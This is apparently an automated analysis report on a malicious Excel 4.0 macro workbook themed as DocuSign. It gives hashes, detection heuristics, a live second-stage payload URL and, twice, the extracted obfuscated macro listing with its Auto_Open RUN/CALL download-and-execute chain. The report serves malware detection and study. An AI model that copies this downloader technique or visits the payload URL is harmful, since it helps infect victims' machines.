Office (OLE) / .XLSX malware analysis — malicious · 0419de2f35855b1a

MALICIOUS

Office (OLE) / .XLSX

332.0 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel

MD5: 2683ecea8cd5b6c4f2e7194abe6e9e30 SHA-1: fe7668cfe4f9652b6fbc0513eb609b7078ae8d5f SHA-256: 0419de2f35855b1a8ede086c7a7cbf47337ce658ac63962de9a45bc692df27b4

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is designed to execute a series of commands. These commands construct a URL and then use the RUN function, likely to download and execute a second-stage payload from the constructed URL: "https://esp.adnan.dev.hostingshouse.com/ds/151120.gif". The presence of ShellExecute API references further supports the execution of external commands.

Heuristics 7

ClamAV: Doc.Downloader.Docusign0521-9864805-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
URL reconstructed from XLM cell array (1 URL) critical OLE_XLM_CELL_ARRAY_URL

Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://esp.adnan.dev.hostingshouse.com/ds/151120.gif� Referenced by macro
- https://esp.adnan.dev.hostingshouse.com/ds/151120.gifReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt
4d5531650e0faf8764ddd7b14e6947143c32308cbf699d36f8845764b3b4560a xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 5603 bytes

Filename	Kind	Source	Size
`xlm_macros.txt` `4d5531650e0faf8764ddd7b14e6947143c32308cbf699d36f8845764b3b4560a`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	5603 bytes
Preview script First 1,000 lines of the extracted script ' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig ' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8 ' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8 ' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8 ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d DocuSig!A50 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' 8 ,A94,RUN(B104),"" ' 8 ,B104,RUN(A203),"" ' 8 ,B200,"https://"&C201&D202&E203,"" ' 8 ,A203,"CALL("K"& 8 !CC261,"C"& 8 !R134,"JCJ", 8 !BH172,0)","" ' 8 ,A204,"CALL("K"& 8 !CJ205,"C"& 8 !R168,"JCJ", 8 !BH172& 8 !BH187,0)","" ' 8 ,A205,"CALL("U"& 8 !CJ233,"U"& 8 !BO262,"JJCCJJ",0,B200, 8 !BH172& 8 !BH187& 8 !BH201,0,0)","" ' 8 ,A206,"CALL( 8 !X152, 8 !X165,"JJCCCCJ",0, 8 !BX227, 8 !BH172& 8 !BH187& 8 !BH201,,0,0)","" ' 8 ,A207,HALT(),"" ' 8 ,EA233,"CONCATENATE(EA235,EA236,EA237,EA238,EA239,EA240,EA241,EA242,EA243,EA244,EA245,EA246,EA247,EA248,EA249)","" ' 8 ,EA234,[],"" ' 8 ,EA235,[],"" ' 8 ,EA236,[],"" ' 8 ,EA237,[],"" ' 8 ,EA238,[],"" ' 8 ,EA239,[],"" ' 8 ,EA240,[],"" ' 8 ,EA241,[],"" ' 8 ,EA242,[],"" ' 8 ,EA243,[],"" ' 8 ,EA244,[],"" ' 8 ,EA245,[],"" ' 8 ,EA246,[],"" ' 8 ,EA247,[],"" ' 8 ,EA248,[],"" ' 8 ,EA249,[],"" ' 8 ,EG251,CONCATENATE(EG252&EG253&EG254&EG255&EG256&EG257&EG258),"" ' 8 ,EG252,CHAR(EH252+EI252+EJ252),"" ' 8 ,EG253,CHAR(EH253+EI253+EJ253),"" ' 8 ,EG254,CHAR(EH254+EI254+EJ254),"" ' 8 ,EG255,CHAR(EH255+EI255+EJ255),"" ' 8 ,EG256,CHAR(EH256-EI256-EJ256),"" ' 8 ,EG257,CHAR(EH257-EI257-EJ257),"" ' 8 ,EG258,CHAR(EH258-EI258-EJ258),"" ' 8 ,EG264,CONCATENATE(EG265&EG266&EG267&EG268&EG269&EG270&EG271&EG272&EG273&EG274&EG275&EG276&EG277),"" ' 8 ,EG265,CHAR(EH265+EI265+EJ265),"" ' 8 ,EG266,CHAR(EH266+EI266+EJ266),"" ' 8 ,EA267,"CONCATENATE(EA269,EA270,EA271,EA272,EA273,EA274,EA275,EA276,EA277,EA278,EA279,EA280,EA281,EA282,EA283)","" ' 8 ,EG267,CHAR(EH267+EI267+EJ267),"" ' 8 ,EA268,CHAR(EB268+EC268+ED268),"" ' 8 ,EG268,CHAR(EH268-EI268-EJ268),"" ' 8 ,EA269,CHAR(EB269+EC269+ED269),"" ' 8 ,EG269,CHAR(EH269-EI269-EJ269),"" ' 8 ,EA270,CHAR(EB270+EC270+ED270),"" ' 8 ,EG270,CHAR(EH270-EI270-EJ270),"" ' 8 ,EA271,CHAR(EB271+EC271+ED271),"" ' 8 ,EG271,CHAR(EH271-EI271-EJ271),"" ' 8 ,EQ271,"CONCATENATE(EQ272,EQ273,EQ274,EQ275,EQ276,EQ277,EQ278,EQ279,EQ280)","" ' 8 ,EA272,CHAR(EB272-EC272-ED272),"" ' 8 ,EG272,CHAR(EH272-EI272+EJ272),"" ' 8 ,EQ272,CHAR(ER272+ES272+ET272),"" ' 8 ,EA273,CHAR(EB273-EC273-ED273),"" ' 8 ,EG273,CHAR(EH273-EI273+EJ273),"" ' 8 ,EQ273,CHAR(ER273+ES273+ET273),"" ' 8 ,EA274,CHAR(EB274-EC274-ED274),"" ' 8 ,EG274,CHAR(EH274-EI274+EJ274),"" ' 8 ,EQ274,CHAR(ER274+ES274+ET274),"" ' 8 ,EA275,CHAR(EB275-EC275-ED275),"" ' 8 ,EG275,CHAR(EH275+EI275-EJ275),"" ' 8 ,EQ275,CHAR(ER275+ES275-ET275),"" ' 8 ,EA276,CHAR(EB276+EC276-ED276),"" ' 8 ,EG276,CHAR(EH276+EI276-EJ276),"" ' 8 ,EQ276,CHAR(ER276+ES276-ET276),"" ' 8 ,EA277,CHAR(EB277+EC277-ED277),"" ' 8 ,EG277,CHAR(EH277+EI277-EJ277),"" ' 8 ,EQ277,CHAR(ER277+ES277-ET277),"" ' 8 ,EA278,CHAR(EB278+EC278-ED278),"" ' 8 ,EQ278,CHAR(ER278-ES278+ET278),"" ' 8 ,EA279,CHAR(EB279+EC279-ED279),"" ' 8 ,EQ279,CHAR(ER279-ES279+ET279),"" ' 8 ,EA280,CHAR(EB280-EC280+ED280),"" ' 8 ,EQ280,CHAR(ER280-ES280+ET280),"" ' 8 ,EA281,CHAR(EB281-EC281+ED281),"" ' 8 ,EA282,CHAR(EB282-EC282+ED282),"" ' 8 ,EA283,CHAR(EB283-EC283+ED283),"" ' 8 ,EQ286,"CONCATENATE(EQ287,EQ288,EQ289,EQ290,EQ291,EQ292,EQ293)","" ' 8 ,EQ287,CHAR(ER287-ES287-ET287),"" ' 8 ,EQ288,CHAR(ER288-ES288-ET288),"" ' 8 ,EQ289,CHAR(ER289-ES289-ET289),"" ' 8 ,EQ290,CHAR(ER290-ES290+ET290),"" ' 8 ,EQ291,CHAR(ER291-ES291+ET291),"" ' 8 ,EQ292,CHAR(ER292-ES292+ET292),"" ' 8 ,EQ293,CHAR(ER293-ES293+ET293),"" ' 8 ,EQ300,"CONCATENATE(EQ301,EQ302,EQ303,EQ304,EQ305,EQ306,EQ307,EQ308,EQ309,EQ310,EQ311,EQ312,EQ313)","" ' 8 ,EQ301,[],"" ' 8 ,EQ302,[],"" ' 8 ,EQ303,[],"" ' 8 ,EQ304,[],"" ' 8 ,EQ305,[],"" ' 8 ,EQ306,[],"" ' 8 ,EQ307,[],"" ' 8 ,EQ308,[],"" ' 8 ,EQ309,[],"" ' 8 ,EQ310,[],"" ' 8 ,EQ311,[],"" ' 8 ,EQ312,[],"" ' 8 ,EQ313,[],""

Preview script

First 1,000 lines of the extracted script

' 0085     16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  DocuSig
' 0085     18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0085     18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -    8 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  DocuSig!A50 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'    8 ,A94,RUN(B104),""
'    8 ,B104,RUN(A203),""
'    8 ,B200,"https://"&C201&D202&E203,""
'    8 ,A203,"CALL("K"&   8 !CC261,"C"&   8 !R134,"JCJ",   8 !BH172,0)",""
'    8 ,A204,"CALL("K"&   8 !CJ205,"C"&   8 !R168,"JCJ",   8 !BH172&   8 !BH187,0)",""
'    8 ,A205,"CALL("U"&   8 !CJ233,"U"&   8 !BO262,"JJCCJJ",0,B200,   8 !BH172&   8 !BH187&   8 !BH201,0,0)",""
'    8 ,A206,"CALL(   8 !X152,   8 !X165,"JJCCCCJ",0,   8 !BX227,   8 !BH172&   8 !BH187&   8 !BH201,,0,0)",""
'    8 ,A207,HALT(),""
'    8 ,EA233,"CONCATENATE(EA235,EA236,EA237,EA238,EA239,EA240,EA241,EA242,EA243,EA244,EA245,EA246,EA247,EA248,EA249)",""
'    8 ,EA234,[],""
'    8 ,EA235,[],""
'    8 ,EA236,[],""
'    8 ,EA237,[],""
'    8 ,EA238,[],""
'    8 ,EA239,[],""
'    8 ,EA240,[],""
'    8 ,EA241,[],""
'    8 ,EA242,[],""
'    8 ,EA243,[],""
'    8 ,EA244,[],""
'    8 ,EA245,[],""
'    8 ,EA246,[],""
'    8 ,EA247,[],""
'    8 ,EA248,[],""
'    8 ,EA249,[],""
'    8 ,EG251,CONCATENATE(EG252&EG253&EG254&EG255&EG256&EG257&EG258),""
'    8 ,EG252,CHAR(EH252+EI252+EJ252),""
'    8 ,EG253,CHAR(EH253+EI253+EJ253),""
'    8 ,EG254,CHAR(EH254+EI254+EJ254),""
'    8 ,EG255,CHAR(EH255+EI255+EJ255),""
'    8 ,EG256,CHAR(EH256-EI256-EJ256),""
'    8 ,EG257,CHAR(EH257-EI257-EJ257),""
'    8 ,EG258,CHAR(EH258-EI258-EJ258),""
'    8 ,EG264,CONCATENATE(EG265&EG266&EG267&EG268&EG269&EG270&EG271&EG272&EG273&EG274&EG275&EG276&EG277),""
'    8 ,EG265,CHAR(EH265+EI265+EJ265),""
'    8 ,EG266,CHAR(EH266+EI266+EJ266),""
'    8 ,EA267,"CONCATENATE(EA269,EA270,EA271,EA272,EA273,EA274,EA275,EA276,EA277,EA278,EA279,EA280,EA281,EA282,EA283)",""
'    8 ,EG267,CHAR(EH267+EI267+EJ267),""
'    8 ,EA268,CHAR(EB268+EC268+ED268),""
'    8 ,EG268,CHAR(EH268-EI268-EJ268),""
'    8 ,EA269,CHAR(EB269+EC269+ED269),""
'    8 ,EG269,CHAR(EH269-EI269-EJ269),""
'    8 ,EA270,CHAR(EB270+EC270+ED270),""
'    8 ,EG270,CHAR(EH270-EI270-EJ270),""
'    8 ,EA271,CHAR(EB271+EC271+ED271),""
'    8 ,EG271,CHAR(EH271-EI271-EJ271),""
'    8 ,EQ271,"CONCATENATE(EQ272,EQ273,EQ274,EQ275,EQ276,EQ277,EQ278,EQ279,EQ280)",""
'    8 ,EA272,CHAR(EB272-EC272-ED272),""
'    8 ,EG272,CHAR(EH272-EI272+EJ272),""
'    8 ,EQ272,CHAR(ER272+ES272+ET272),""
'    8 ,EA273,CHAR(EB273-EC273-ED273),""
'    8 ,EG273,CHAR(EH273-EI273+EJ273),""
'    8 ,EQ273,CHAR(ER273+ES273+ET273),""
'    8 ,EA274,CHAR(EB274-EC274-ED274),""
'    8 ,EG274,CHAR(EH274-EI274+EJ274),""
'    8 ,EQ274,CHAR(ER274+ES274+ET274),""
'    8 ,EA275,CHAR(EB275-EC275-ED275),""
'    8 ,EG275,CHAR(EH275+EI275-EJ275),""
'    8 ,EQ275,CHAR(ER275+ES275-ET275),""
'    8 ,EA276,CHAR(EB276+EC276-ED276),""
'    8 ,EG276,CHAR(EH276+EI276-EJ276),""
'    8 ,EQ276,CHAR(ER276+ES276-ET276),""
'    8 ,EA277,CHAR(EB277+EC277-ED277),""
'    8 ,EG277,CHAR(EH277+EI277-EJ277),""
'    8 ,EQ277,CHAR(ER277+ES277-ET277),""
'    8 ,EA278,CHAR(EB278+EC278-ED278),""
'    8 ,EQ278,CHAR(ER278-ES278+ET278),""
'    8 ,EA279,CHAR(EB279+EC279-ED279),""
'    8 ,EQ279,CHAR(ER279-ES279+ET279),""
'    8 ,EA280,CHAR(EB280-EC280+ED280),""
'    8 ,EQ280,CHAR(ER280-ES280+ET280),""
'    8 ,EA281,CHAR(EB281-EC281+ED281),""
'    8 ,EA282,CHAR(EB282-EC282+ED282),""
'    8 ,EA283,CHAR(EB283-EC283+ED283),""
'    8 ,EQ286,"CONCATENATE(EQ287,EQ288,EQ289,EQ290,EQ291,EQ292,EQ293)",""
'    8 ,EQ287,CHAR(ER287-ES287-ET287),""
'    8 ,EQ288,CHAR(ER288-ES288-ET288),""
'    8 ,EQ289,CHAR(ER289-ES289-ET289),""
'    8 ,EQ290,CHAR(ER290-ES290+ET290),""
'    8 ,EQ291,CHAR(ER291-ES291+ET291),""
'    8 ,EQ292,CHAR(ER292-ES292+ET292),""
'    8 ,EQ293,CHAR(ER293-ES293+ET293),""
'    8 ,EQ300,"CONCATENATE(EQ301,EQ302,EQ303,EQ304,EQ305,EQ306,EQ307,EQ308,EQ309,EQ310,EQ311,EQ312,EQ313)",""
'    8 ,EQ301,[],""
'    8 ,EQ302,[],""
'    8 ,EQ303,[],""
'    8 ,EQ304,[],""
'    8 ,EQ305,[],""
'    8 ,EQ306,[],""
'    8 ,EQ307,[],""
'    8 ,EQ308,[],""
'    8 ,EQ309,[],""
'    8 ,EQ310,[],""
'    8 ,EQ311,[],""
'    8 ,EQ312,[],""
'    8 ,EQ313,[],""

Open this report in the interactive analyzer, or submit your own file for analysis.